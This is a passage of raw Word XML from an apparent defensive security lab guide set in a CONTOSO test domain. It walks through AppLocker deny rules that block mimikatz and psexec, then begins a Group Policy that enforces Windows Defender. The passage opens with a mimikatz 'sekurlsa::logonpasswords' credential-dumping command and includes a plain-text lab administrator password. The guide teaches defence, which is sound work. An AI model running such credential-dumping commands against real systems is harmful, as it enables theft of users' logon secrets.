              <w:t xml:space="preserve">"c:\hack\mimikatz_trunk\x64\mimikatz.exe </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="001613B8" w:rsidRPr="001613B8">
              <w:t>privilege::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="001613B8" w:rsidRPr="001613B8">
              <w:t xml:space="preserve">debug </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="001613B8" w:rsidRPr="001613B8">
              <w:t>sekurlsa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="001613B8" w:rsidRPr="001613B8">
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="001613B8" w:rsidRPr="001613B8">
              <w:t>logonpasswords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="001613B8" w:rsidRPr="001613B8">
              <w:t xml:space="preserve"> exit".</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4AA3586D" w14:textId="77842303" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="009D46CA"/>
    <w:p w14:paraId="694DE4B1" w14:textId="1A157E4C" w:rsidR="000D4F07" w:rsidRPr="00C6425D" w:rsidRDefault="000D4F07" w:rsidP="00C6425D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="79669E8B" w14:textId="459AED6B" w:rsidR="00722743" w:rsidRDefault="00722743" w:rsidP="00722743">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc44075689"/>
      <w:r w:rsidRPr="00F20CB2">
        <w:lastRenderedPageBreak/>
        <w:t>Task</w:t>
      </w:r>
      <w:r w:rsidR="00471EBC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED41C0">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F20CB2">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>Configure AppLocker to block psexec.exe and mimikatz.exe</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:bookmarkEnd w:id="44"/>
    <w:p w14:paraId="1C27AB14" w14:textId="51922219" w:rsidR="00722743" w:rsidRDefault="005F03AD" w:rsidP="00722743">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">In this </w:t>
      </w:r>
      <w:r w:rsidRPr="005F03AD">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>exercise</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> you will see how to prevent application running using AppLocker policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3305CD" w14:textId="77777777" w:rsidR="005F03AD" w:rsidRPr="00C6425D" w:rsidRDefault="005F03AD" w:rsidP="00722743">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40A9D54B" w14:textId="6E5E3C7B" w:rsidR="00722743" w:rsidRDefault="0036137C" w:rsidP="00722743">
      <w:r>
        <w:t xml:space="preserve">Edit VICTIM-DC VM settings and map </w:t>
      </w:r>
      <w:r w:rsidR="00BA124E" w:rsidRPr="00BA124E">
        <w:t>C:\_ISO</w:t>
      </w:r>
      <w:r w:rsidR="00BA124E">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="0036137C">
        <w:t>Lab_Tools_v2.iso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as media drive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F531DF" w14:textId="1B3D98DD" w:rsidR="0036137C" w:rsidRDefault="0036137C" w:rsidP="00722743">
      <w:r>
        <w:t>Logon using CONTOSO\Administrator on VICTIM-DC machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251E1C0C" w14:textId="675BCE6D" w:rsidR="0036137C" w:rsidRDefault="0036137C" w:rsidP="0036137C">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Open Group Policy Management Console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3CEE59" w14:textId="77777777" w:rsidR="0036137C" w:rsidRDefault="0036137C" w:rsidP="0036137C">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0036137C">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Create</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0036137C">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> a new GPO on OU=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0036137C">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>COMPUTER,OU</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0036137C">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>=LAB,DC=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0036137C">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>contoso,DC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0036137C">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0036137C">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>lab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0036137C">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> OU, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>called</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0036137C">
        <w:rPr>
          <w:b/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Lab-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0036137C">
        <w:rPr>
          <w:b/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>AppLocker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="480B2774" w14:textId="263C65FF" w:rsidR="0036137C" w:rsidRDefault="0036137C" w:rsidP="0036137C">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Edit </w:t>
      </w:r>
      <w:r w:rsidRPr="0036137C">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Lab-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0036137C">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>AppLocker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>GPO:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7621BC14" w14:textId="2FA55EB4" w:rsidR="0036137C" w:rsidRDefault="0036137C" w:rsidP="0036137C">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0036137C">
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidRPr="0036137C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Computer Configuration/Policies/Windows Settings/Security Settings/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0036137C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SystemServices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, set "</w:t>
      </w:r>
      <w:r w:rsidRPr="0036137C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Application Identity</w:t>
      </w:r>
      <w:r>
        <w:t>" to start Automatic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762EEE83" w14:textId="64FDA98E" w:rsidR="0036137C" w:rsidRDefault="00B31438" w:rsidP="0036137C">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0036137C">
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidRPr="0036137C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Computer Configuration/Policies/Windows Settings/Security Settings/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Application Control Policies/AppLocker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and click on "Configure Rule enforcement" link:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725E902A" w14:textId="6DB17FD1" w:rsidR="00B31438" w:rsidRPr="0036137C" w:rsidRDefault="00B31438" w:rsidP="00B31438">
      <w:r w:rsidRPr="00B31438">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D815BE0" wp14:editId="76AE9064">
            <wp:extent cx="4810160" cy="3667152"/>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0160" cy="3667152"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A8EBB0" w14:textId="03AD83D5" w:rsidR="00722743" w:rsidRPr="00B31438" w:rsidRDefault="00B31438" w:rsidP="00B31438">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0036137C">
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidRPr="0036137C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Computer Configuration/Policies/Windows Settings/Security Settings/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Application Control Policies/AppLocker/Executable Rules</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AC07A2" w14:textId="54247149" w:rsidR="00B31438" w:rsidRDefault="00B31438" w:rsidP="00CB5110">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Create Deny permission</w:t>
      </w:r>
      <w:r w:rsidR="00CB5110">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> rule, for Publisher condition, then select </w:t>
      </w:r>
      <w:r w:rsidR="00CB5110" w:rsidRPr="00CB5110">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>D:\mimikatz_trunk\x64</w:t>
      </w:r>
      <w:r w:rsidR="00CB5110">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>\mimikatz.exe file to fill dynamically publisher information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151AD393" w14:textId="0223995E" w:rsidR="00CB5110" w:rsidRDefault="00CB5110" w:rsidP="00CB5110">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB5110">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="292E35D1" wp14:editId="6CD352FD">
            <wp:extent cx="3648102" cy="3067072"/>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102" cy="3067072"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABF5C87" w14:textId="25B01179" w:rsidR="00CB5110" w:rsidRDefault="00CB5110" w:rsidP="00CB5110">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>When you complete the first rule you will be prompt to create default rules: select Yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9B12FE" w14:textId="79FF2258" w:rsidR="00CB5110" w:rsidRDefault="00CB5110" w:rsidP="00CB5110">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB5110">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AB5BDDB" wp14:editId="1941524D">
            <wp:extent cx="2295542" cy="1000132"/>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42" cy="1000132"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD58A05" w14:textId="043E2F8B" w:rsidR="00CB5110" w:rsidRDefault="00CB5110" w:rsidP="00CB5110">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a second deny rule, on publisher type, and select </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB5110">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>D:\SysinternalsSuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>\psexec.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B2ABE7" w14:textId="0EA5663F" w:rsidR="00CB5110" w:rsidRDefault="00CB5110" w:rsidP="00CB5110">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>After rule completion you may have 5 executable rules: three allow and two deny.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A504744" w14:textId="0F4656A8" w:rsidR="00CB5110" w:rsidRDefault="00CB5110" w:rsidP="00CB5110">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Close group policy editor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416AC9D8" w14:textId="256E0E1A" w:rsidR="006A0A84" w:rsidRPr="00CB5110" w:rsidRDefault="00CB5110" w:rsidP="00CB5110">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Force GPO application on VICTIM-PC and VICTIM-SRV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC7D124" w14:textId="0A1FC3FB" w:rsidR="00CB5110" w:rsidRDefault="00CB5110" w:rsidP="00C6425D">
      <w:bookmarkStart w:id="50" w:name="_Hlk524114200"/>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CB5110" w14:paraId="7250B8C8" w14:textId="77777777" w:rsidTr="0045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2FAF4758" w14:textId="77777777" w:rsidR="00CB5110" w:rsidRDefault="00CB5110" w:rsidP="00457366">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB5110" w14:paraId="7AFAC34A" w14:textId="77777777" w:rsidTr="0045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DCDCB3E" w14:textId="2BC3653D" w:rsidR="00CB5110" w:rsidRDefault="00CB5110" w:rsidP="00457366">
            <w:r>
              <w:t>Collect HTML file generated with command "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00722743">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>PResult</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> /H c:\%COMPUTERNAME%_report.html"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> from both VICTIM-PC and VICTIM-SRV</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="50"/>
    </w:tbl>
    <w:p w14:paraId="7A50AF95" w14:textId="115559D2" w:rsidR="00CB5110" w:rsidRDefault="00CB5110" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12638663" w14:textId="6B98EDD6" w:rsidR="00DC6DB9" w:rsidRDefault="00DC6DB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28945161" w14:textId="4E080AB7" w:rsidR="00ED41C0" w:rsidRDefault="00ED41C0" w:rsidP="00ED41C0">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc44075690"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 4: Create group policy to enforce Windows Defender</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="5D02B0C1" w14:textId="77777777" w:rsidR="00ED41C0" w:rsidRPr="00BB3100" w:rsidRDefault="00ED41C0" w:rsidP="00ED41C0">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3100">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Here are the step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3100">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> to enforce Windows Defender running on system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B43D6FF" w14:textId="77777777" w:rsidR="00ED41C0" w:rsidRPr="00CA4508" w:rsidRDefault="00ED41C0" w:rsidP="00ED41C0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Connect on VICTIM-DC with this account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049BCA49" w14:textId="77777777" w:rsidR="00ED41C0" w:rsidRDefault="00ED41C0" w:rsidP="00ED41C0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Account: Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ABF73B" w14:textId="77777777" w:rsidR="00ED41C0" w:rsidRDefault="00ED41C0" w:rsidP="00ED41C0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Domain: CONTOSO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3892C9" w14:textId="77777777" w:rsidR="00ED41C0" w:rsidRDefault="00ED41C0" w:rsidP="00ED41C0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Password: FY19-ECE#Pwd!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546408A1" w14:textId="77777777" w:rsidR="00ED41C0" w:rsidRPr="00CA4508" w:rsidRDefault="00ED41C0" w:rsidP="00ED41C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CABD9A3" w14:textId="77777777" w:rsidR="00ED41C0" w:rsidRPr="00810D05" w:rsidRDefault="00ED41C0" w:rsidP="00ED41C0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Start Group Policy Management console (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GPMC.msc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C91131" w14:textId="77777777" w:rsidR="00ED41C0" w:rsidRPr="00CA4508" w:rsidRDefault="00ED41C0" w:rsidP="00ED41C0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A54983" w14:textId="77777777" w:rsidR="00ED41C0" w:rsidRDefault="00ED41C0" w:rsidP="00ED41C0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Create new group policy named </w:t>
      </w:r>
      <w:r w:rsidRPr="00810D05">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Lab-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00810D05">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Enable_WD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> at domain level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B01EFB9" w14:textId="77777777" w:rsidR="00ED41C0" w:rsidRPr="00810D05" w:rsidRDefault="00ED41C0" w:rsidP="00ED41C0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00810D05">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidRPr="0036137C">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Computer Configuration\Policies\Administrative Templates\Windows Components</w:t>
      </w:r>
      <w:r w:rsidRPr="00810D05">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>and s</w:t>
      </w:r>
      <w:r w:rsidRPr="00810D05">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>et "</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE52A7">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Turn off Windows Defender</w:t>
      </w:r>
      <w:r w:rsidRPr="00810D05">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">" to </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE52A7">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Disable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04564A7A" w14:textId="77777777" w:rsidR="00ED41C0" w:rsidRPr="00810D05" w:rsidRDefault="00ED41C0" w:rsidP="00ED41C0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00810D05">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidRPr="0036137C">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Computer Configuration\Policies\Administrative Templates\Windows Components\Real-time Protection</w:t>
      </w:r>
